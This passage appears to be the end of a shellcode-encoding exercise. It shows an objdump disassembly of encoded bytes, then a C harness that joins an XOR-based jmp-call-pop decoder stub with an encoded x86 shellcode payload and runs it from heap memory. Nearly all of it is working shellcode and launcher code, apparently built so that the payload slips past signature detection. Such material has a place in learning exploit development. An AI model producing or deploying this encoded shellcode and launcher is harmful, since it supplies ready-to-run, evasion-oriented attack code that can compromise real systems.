80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
80480c8: 2c 54 sub al,0x54
80480ca: 0c 78 or al,0x78
80480cc: 05 6a 37 58 e4 add eax,0xe458376a
80480d1: 8b dc mov ebx,esp
80480d3: 04 3b add al,0x3b
80480d5: ce into
80480d6: b6 4a mov dh,0x4a
80480d8: af scas eax,DWORD PTR es:[edi]
80480d9: 53 push ebx
80480da: 59 pop ecx
80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
80480dc: b5 05 mov ch,0x5
80480de: f7 30 div DWORD PTR [eax]
80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
80480e5: 60 pusha
80480e6: e4 10 in al,0x10
80480e8: 7d cc jge 80480b6 <encoded+0x20>
80480ea: 56 push esi
80480eb: cc int3
80480ec: aa stos BYTE PTR es:[edi],al
****************************************************/
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
unsigned char stub[] = \
"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
unsigned char shellcode[] = \
"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
unsigned char* code;
main()
{
printf("\nStub Length: %d\n", strlen(stub));
printf("Shellcode Length: %d\n\n", strlen(shellcode));
printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));
code = malloc(strlen(stub) + strlen(shellcode));
memcpy(code, stub, strlen(stub));
memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));
int (*ret)() = (int(*)())code;
ret();
}